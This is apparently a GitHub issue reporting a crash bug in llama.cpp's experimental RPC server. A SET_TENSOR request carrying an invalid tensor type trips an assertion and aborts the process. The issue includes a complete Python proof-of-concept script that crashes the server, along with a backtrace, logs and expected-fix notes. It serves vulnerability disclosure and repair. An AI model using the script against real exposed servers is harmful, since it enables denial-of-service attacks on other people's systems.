Misc. bug: RPC server crash on SET_TENSOR with invalid ggml_type #13067

Open
thevilledev opened this issue Apr 22, 2025 · 0 comments · May be fixed by #13069

Name and Version

$ llama-cli --version
register_backend: registered backend Metal (1 devices)
register_device: registered device Metal (Apple M1 Pro)
register_backend: registered backend BLAS (1 devices)
register_device: registered device BLAS (Accelerate)
register_backend: registered backend RPC (0 devices)
register_backend: registered backend CPU (1 devices)
register_device: registered device CPU (Apple M1 Pro)
version: 5169 (6cf3a31e)
built with Apple clang version 17.0.0 (clang-1700.0.13.3) for arm64-apple-darwin24.4.0

Operating systems

Mac

Which llama.cpp modules do you know to be affected?

Other (Please specify in the next section)

Command line

./build/bin/rpc-server -p 50052

Problem description & steps to reproduce

Description

NOTE: This was originally reported as a security advisory. After discussion with the maintainers, it is now disclosed as a public issue, because the RPC server is still an experimental feature (see RPC example).

The rpc-server crashes when it processes an RPC_CMD_SET_TENSOR command whose rpc_tensor structure carries an invalid ggml_type value. The server does not validate the type field read from the network before using it internally. As a result, the assertion GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) fails during tensor deserialization (the backtrace below shows rpc_server::deserialize_tensor calling ggml_new_tensor_4d), and the server process terminates via abort().

Expected Behavior

The server should validate the ggml_type read from the SET_TENSOR data before passing it to GGML functions. If the type is invalid, the server should:

  • Log an error message indicating invalid input.
  • Reject the command (e.g., send an error response or simply close the connection).
  • Continue running without crashing.
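The expected behavior above can be modeled with a short Python sketch. It is not the C++ fix and not the server's code: the helper names are hypothetical, and the field offset (8), the 32-bit little-endian width, and the type count (32) are placeholder assumptions chosen for illustration. The real bound is the GGML_TYPE_COUNT enumerator of the ggml version in use.

```python
import struct
import sys


def read_type_or_reject(payload: bytes, type_offset: int, type_count: int):
    """Return the type value if it lies in [0, type_count), else None."""
    # Reject payloads that are too short to contain the field at all.
    if type_offset < 0 or len(payload) < type_offset + 4:
        return None
    # Assumption: the type is an unsigned 32-bit little-endian integer.
    (raw_type,) = struct.unpack_from("<I", payload, type_offset)
    if raw_type >= type_count:
        return None
    return raw_type


def handle_set_tensor(payload: bytes, type_offset: int = 8, type_count: int = 32) -> bool:
    """Hypothetical handler: log and reject instead of asserting."""
    tensor_type = read_type_or_reject(payload, type_offset, type_count)
    if tensor_type is None:
        print("[rpc] rejecting SET_TENSOR: invalid tensor type", file=sys.stderr)
        return False  # caller can send an error or close the connection
    return True  # safe to continue with deserialization


if __name__ == "__main__":
    print(handle_set_tensor(b"A" * 1032))                             # rejected
    print(handle_set_tensor(struct.pack("<QI", 1, 0) + bytes(16)))    # accepted
```

The point of the sketch is the ordering: the range check happens on the untrusted value before any library call that asserts on it, so a bad request costs one connection rather than the whole process.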

Actual Behavior

The server reads the invalid ggml_type (e.g., 65 if the payload starts with 'A' bytes) and uses it internally. A GGML_ASSERT checking the type validity fails, causing the server process to terminate via abort(). The client typically sees the connection break unexpectedly.
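To make the numbers concrete, the following sketch decodes a run of 'A' bytes at two field widths. Which width the server actually uses depends on the rpc_tensor definition, which this report does not quote, so both are shown as assumptions. Either way the decoded value is a positive integer well above any small enumeration bound.

```python
import struct

garbage = b"A" * 16  # same filler byte the PoC sends

# Interpreted as a single unsigned byte.
as_u8 = garbage[0]

# Interpreted as an unsigned 32-bit little-endian integer.
(as_u32,) = struct.unpack_from("<I", garbage, 0)

print(as_u8)        # 65
print(hex(as_u32))  # 0x41414141
```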

Steps to Reproduce

  1. Clone the repository: git clone git@github.com:ggml-org/llama.cpp.git && cd llama.cpp
  2. Build the rpc-server binary: cmake -B build . -DGGML_RPC=ON && cd build && cmake --build . --config Release --target rpc-server
  3. Run the server from the build directory: ./bin/rpc-server -p 50052
  4. Save the Python proof-of-concept script below as poc_rpc_crash.py and run it: python poc_rpc_crash.py

import socket
import struct
import sys
import time

# Server details (change if needed)
DEFAULT_HOST = "127.0.0.1"
DEFAULT_PORT = 50052

# GGML RPC Commands (enum rpc_cmd)
RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14

# Size definitions
PAYLOAD_DATA_SIZE = 1 * 1024 # 1 KB of 'A's
INTERNAL_SIZE_FIELD_VAL = PAYLOAD_DATA_SIZE # Value for the internal size field
CHUNK_SIZE = 1024 # Send data in 1KB chunks

# --- Helper Functions ---

def p8(value):
    """Packs an integer into a 1-byte byte string (unsigned char)."""
    return struct.pack('<B', value)

def p64(value):
    """Packs an integer into an 8-byte byte string (unsigned long long)."""
    return struct.pack('<Q', value)

def u64(value_bytes):
    """Unpacks an 8-byte byte string into an integer (unsigned long long)."""
    return struct.unpack('<Q', value_bytes)[0]

def recv_exact(sock, num_bytes):
    """Receives exactly num_bytes from the socket."""
    data = b''
    start_time = time.time()
    # Use socket timeout if set
    timeout = sock.gettimeout()

    while len(data) < num_bytes:
        try:
            # Check for timeout if applicable
            if timeout and (time.time() - start_time > timeout):
                print(f"[-] Socket timeout after {timeout}s waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            # Calculate remaining bytes, request at most CHUNK_SIZE
            remaining = num_bytes - len(data)
            chunk = sock.recv(min(remaining, CHUNK_SIZE))
            if not chunk:
                # Connection closed prematurely
                print(f"[-] Connection closed by peer while trying to receive {num_bytes} bytes (got {len(data)})", file=sys.stderr)
                return None
            data += chunk
        except socket.timeout:
            print(f"[-] Socket timeout explicitly caught waiting for {num_bytes} bytes (got {len(data)})", file=sys.stderr)
            return None
        except OSError as e:
            print(f"[-] Socket error during recv_exact: {e}", file=sys.stderr)
            return None
    return data

def send_all(sock, data):
    """Sends all data reliably."""
    try:
        sock.sendall(data)
        return True
    except OSError as e:
        print(f"[-] Socket error during send_all: {e}", file=sys.stderr)
        return False

def send_data_chunks_native(sock, size):
    """Sends 'size' bytes of 'A' in chunks using standard sockets."""
    bytes_sent = 0
    num_chunks = (size + CHUNK_SIZE - 1) // CHUNK_SIZE
    for i in range(num_chunks):
        current_chunk_size = min(CHUNK_SIZE, size - bytes_sent)
        chunk = b'A' * current_chunk_size
        if not send_all(sock, chunk):
            print(f"[-] Failed to send chunk {i+1}", file=sys.stderr)
            return False
        bytes_sent += current_chunk_size
    return True

# --- Main Logic ---

def run_exploit_native(host, port):
    print(f"[*] Connecting to {host}:{port}...")
    sock = None
    try:
        # Set a connection timeout
        sock = socket.create_connection((host, port), timeout=10)
        print("[+] Connected.")
        # Set a timeout for subsequent socket operations
        sock.settimeout(15)

        print("[*] Performing HELLO handshake...")
        hello_cmd = p8(RPC_CMD_HELLO)
        hello_input_size = p64(0)
        hello_packet = hello_cmd + hello_input_size
        if not send_all(sock, hello_packet): raise ConnectionError("Failed to send HELLO packet")

        hello_resp_size_bytes = recv_exact(sock, 8)
        if not hello_resp_size_bytes: raise ConnectionError("Server closed during HELLO response size read")
        hello_resp_size = u64(hello_resp_size_bytes)

        # Expecting 3 bytes: major, minor, patch version
        if hello_resp_size < 3:
            # Allow for potential future expansion, but need at least 3 for version
            print(f"[!] Warning: Unexpected HELLO response size: {hello_resp_size}. Expected >= 3.")
            # Attempt to read anyway if size > 0
            if hello_resp_size == 0:
                raise ValueError("HELLO response size is zero.")

        hello_resp_data = recv_exact(sock, hello_resp_size)
        if not hello_resp_data or len(hello_resp_data) < 3:
            raise ConnectionError("Incomplete HELLO response data received")
        print(f"[+] HELLO ok (v{hello_resp_data[0]}.{hello_resp_data[1]}.{hello_resp_data[2]}) Received {len(hello_resp_data)} bytes total.")

        print("[*] Attempting crash via SET_TENSOR with invalid type in 1KB payload...")
        cmd = p8(RPC_CMD_SET_TENSOR)

        # This is the size field read by recv_msg to determine buffer size
        internal_size_field = p64(INTERNAL_SIZE_FIELD_VAL)

        # This is the 'total payload size' field sent after the command byte.
        # It should reflect the size of data *following* this field.
        # In this case, it's the internal_size_field (8 bytes) + the actual garbage data (PAYLOAD_DATA_SIZE bytes)
        actual_payload_size_val = 8 + PAYLOAD_DATA_SIZE
        actual_payload_size_field = p64(actual_payload_size_val)

        # Header: command_byte (1) + actual_payload_size (8) + internal_size_field (8)
        fixed_header = cmd + actual_payload_size_field + internal_size_field
        print(f"[*] Sending header (Cmd: {RPC_CMD_SET_TENSOR}, TotalPayloadSize: {actual_payload_size_val}, InternalResizeField: {u64(internal_size_field):#x}) -> {len(fixed_header)} bytes")

        if not send_all(sock, fixed_header):
            raise ConnectionError("Failed to send fixed header")

        # Send the 1KB garbage data ('A' * 1024)
        print(f"[*] Sending {PAYLOAD_DATA_SIZE} bytes of garbage data ('A' * {PAYLOAD_DATA_SIZE})...")
        if not send_data_chunks_native(sock, PAYLOAD_DATA_SIZE):
            raise ConnectionError("Failed during data chunk send")
        print(f"[+] Header and {PAYLOAD_DATA_SIZE} bytes of data sent.")

        # Expect the server to crash after receiving data and trying to process it
        print("[*] Waiting for server disconnect (expecting crash after processing header)...")
        # Try receiving a small amount of data. An empty read means disconnected (crashed).
        # Using a longer timeout here as processing might take a moment before crash
        sock.settimeout(10)
        recv_data = None
        try:
            recv_data = sock.recv(1024)
        except socket.timeout:
            # This could happen if the server hangs instead of crashing, less likely for this specific bug
            print("[-] Timeout waiting for server disconnect. Server might be hung?")
            # Still consider it potentially successful if timeout occurs after sending bad data
            print("[?] Vulnerability might still be triggered if server is unresponsive.")
            return # Exit gracefully
        except OSError as e:
            # Connection reset/broken pipe often indicates server crash
            print(f"[+] Socket error likely indicating server crash: {e}. Vulnerability Confirmed.")
            return # Exit gracefully

        if recv_data:
            print(f"[-] Received unexpected data ({len(recv_data)} bytes): {recv_data[:64]}... Server might not have crashed.")
        else:
            # recv() returning 0 bytes means the other side closed the connection cleanly.
            print("[+] Connection closed by server (received 0 bytes - likely crashed due to assertion failure). Vulnerability Confirmed.")

    except ConnectionRefusedError:
        print(f"[-] Connection refused by {host}:{port}. Is the server running?", file=sys.stderr)
    except socket.timeout:
        print("[-] Timeout during connection or initial handshake. Check server state.", file=sys.stderr)
    except (ConnectionError, ValueError, OSError, struct.error) as e:
        print(f"[-] An error occurred: {e}", file=sys.stderr)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}", file=sys.stderr)
        import traceback
        traceback.print_exc()
    finally:
        if sock:
            sock.close()
            print("[*] Connection closed.")

if __name__ == "__main__":
    target_host = DEFAULT_HOST
    target_port = DEFAULT_PORT
    if len(sys.argv) > 1:
        target_host = sys.argv[1]
    if len(sys.argv) > 2:
        try:
            target_port = int(sys.argv[2])
        except ValueError:
            print(f"[-] Invalid port: {sys.argv[2]}", file=sys.stderr)
            sys.exit(1)

    run_exploit_native(target_host, target_port)
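The framing used by the script above (one command byte, an 8-byte little-endian payload length, then the payload) can be condensed into one helper. This is a sketch derived from how the PoC builds its packets, not from the server source; build_frame is a hypothetical name.

```python
import struct

RPC_CMD_SET_TENSOR = 6
RPC_CMD_HELLO = 14


def build_frame(cmd: int, payload: bytes = b"") -> bytes:
    """Return cmd (1 byte) + len(payload) (8 bytes, little-endian) + payload."""
    return struct.pack("<BQ", cmd, len(payload)) + payload


# HELLO carries no payload: 1 command byte + 8 length bytes.
hello_frame = build_frame(RPC_CMD_HELLO)

# Same bytes the PoC sends for SET_TENSOR: an 8-byte field followed by 1 KB of 'A'.
crash_frame = build_frame(RPC_CMD_SET_TENSOR, struct.pack("<Q", 1024) + b"A" * 1024)

print(len(hello_frame), len(crash_frame))  # 9 1041
```

Computing the length field from the payload itself avoids the header and body sizes drifting apart when the payload is changed.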

Debugger backtrace to confirm crash:

* thread #1, queue = 'com.apple.main-thread', stop reason = signal SIGABRT
  * frame #0: 0x0000000199164388 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x000000019919d88c libsystem_pthread.dylib`pthread_kill + 296
    frame #2: 0x00000001990a6c60 libsystem_c.dylib`abort + 124
    frame #3: 0x000000010032d31c libggml-base.dylib`ggml_abort + 116
    frame #4: 0x000000010032eb54 libggml-base.dylib`ggml_new_tensor_impl + 824
    frame #5: 0x000000010032ed08 libggml-base.dylib`ggml_new_tensor_4d + 56
    frame #6: 0x000000010005ed18 libggml-rpc.dylib`rpc_server::deserialize_tensor(ggml_context*, rpc_tensor const*) + 56
    frame #7: 0x000000010005f208 libggml-rpc.dylib`rpc_server::set_tensor(std::__1::vector<unsigned char, std::__1::allocator<unsigned char>> const&) + 136
    frame #8: 0x00000001000610ac libggml-rpc.dylib`ggml_backend_rpc_start_server + 2008
    frame #9: 0x0000000100003214 rpc-server`main + 3012
    frame #10: 0x0000000198dfeb4c dyld`start + 6000

First Bad Commit

5e31828

Relevant log output

Starting RPC server v1.0.0
  endpoint       : 127.0.0.1:50052
  local cache    : n/a
  backend memory : 16384 MB
Accepted client connection, free_mem=17179869184, total_mem=17179869184
/Users/ville/git/llama.cpp/ggml/src/ggml.c:1568: GGML_ASSERT(type >= 0 && type < GGML_TYPE_COUNT) failed
[1]    61001 abort      ./bin/rpc-server
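
When testing a fix, a simple way to check the "continue running" expectation is to probe the port again after sending the malformed request. The sketch below only checks that something still accepts TCP connections on the endpoint; it does not speak the RPC protocol. is_listening is a hypothetical helper name.

```python
import socket


def is_listening(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port can be established."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers connection refused, timeouts, and unreachable hosts.
        return False


if __name__ == "__main__":
    # Assumed endpoint, matching the command line used in this report.
    alive = is_listening("127.0.0.1", 50052)
    print("server still accepting connections" if alive else "server is down")
```

Run against the unpatched build after the PoC, the probe is expected to report the server as down, since the process has aborted.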